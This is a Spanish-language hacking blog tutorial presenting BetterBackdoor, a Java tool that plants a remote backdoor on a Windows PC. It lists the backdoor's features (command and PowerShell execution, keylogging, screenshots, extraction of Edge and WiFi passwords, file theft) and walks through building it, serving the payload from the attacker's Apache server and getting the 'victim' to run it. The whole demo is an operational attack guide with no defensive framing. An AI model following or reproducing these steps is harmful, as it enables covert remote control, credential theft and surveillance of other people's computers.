Por lo general, las herramientas de puerta trasera o backdoor como NetCat tienen 2 funciones principales: canalizar la entrada remota en cmd o bash y generar la respuesta. Esto es útil, pero también es limitado. BetterBackdoor supera estas limitaciones al incluir la capacidad de inyectar pulsaciones de teclas, obtener capturas de pantalla, transferir archivos y muchas otras tareas.
1. Características de BetterBackdoor
BetterBackdoor puede crear y controlar una puerta trasera (de ahora en adelante, Backdoor).
Esta Backdoor creada puede:
- Ejecutar comandos del símbolo del sistema
- Ejecutar scripts de PowerShell
- Extraer archivos en función de la extensión
- Ejecutar DuckyScripts para inyectar pulsaciones de teclas
- Extraer las contraseñas de Microsoft Edge y WiFi
- Enviar y recibir archivos hacia y desde la computadora de la víctima
- Iniciar un keylogger
- Obtener una captura de pantalla de la computadora de la víctima
- Copiar texto en el portapapeles de la víctima.
- Obtener contenido del archivo de una víctima (
cat
)
2. Instalar BetterBackdoor
Requisitos
- Una distribución con JDK de Java >= 8.
- Debe usar la misma computadora para crear y controlar la Backdoor.
- La computadora utilizada para crear la puerta trasera debe estar en la misma red WiFi que la computadora de la víctima.
- La dirección IPv4 de esta computadora debe permanecer estática en el tiempo entre la creación de la Backdoor y su control.
- El equipo utilizado para controlar la Backdoor deben tener su firewall desactivado, y si el equipo tiene un sistema operativo Unix, deberás ejecutar BetterBackdoor como ‘
sudo
‘.
Entonces, los pasos son los siguientes:
git clone https://github.com/ThatcherDev/BetterBackdoor.git
cd BetterBackdoor
chmod +x mvnw
./mvnw clean package
3. Ataque a Windows con BetterBackdoor: Demo
Para crear la puerta trasera, inicia BetterBackdoor:
- Iniciamos el programa. Hay dos opciones: crear una Backdoor (
0
) y escucharla (1
). Primero creamos nuestra puerta trasera, por lo que escribimos0
. Presionamos la telca Intro dos veces para crear nuestra Backdoor.
java -jar betterbackdoor.jar
- Lo siguiente que sucede es que se crea ‘run.jar’ y es copiado al directorio ‘
/Backdoor
‘. - Para iniciar la Backdoor en una PC víctima, vamos a transferir el archivos del directorio ‘
/Backdoor
‘ a una PC víctima. Entonces, vamos a comprimirlo como un archivo.zip
.
zip -r archivo.zip run.jar
- Como ejemplo, lo compartiré en la red local, ya que lo abriré en una PC con Windows 10 dentro de la red.
sudo mv archivo.zip /var/www/html/
- Hace falta inicializar el servidor Apache2:
service apache2 start
- Para averiguar nuestra dirección IP: Con esta IP podemos acceder al archivo alojado en la PC atacante y descargarlo en la PC víctima.
ifconfig
- La PC víctima debe ejecutar
run.jar
. Esto iniciará la Backdoor en la PC de la víctima. Una vez que se ejecuta, para controlar la Backdoor, debes volver a BetterBackdoor y ejecutar la opción1
al iniciar el programa, mientras estás conectado a la misma red WiFi que la computadora de la víctima.
4. Screenshots + Vídeo
https://youtu.be/Si4ianNZK6I
Si te gusta el contenido y deseas apoyar a la mejora del sitio web, considera hacer una contribución ¡haciendo clic aquí por favor!. ¡NO ES OBLIGATORIO, GRACIAS! :’)
¿Te ha gustado este artículo? Sigue este blog en su fanpage de Facebook, Twitter, Instagram y/o YouTube para que no te pierdas del mejor contenido informático y hacking!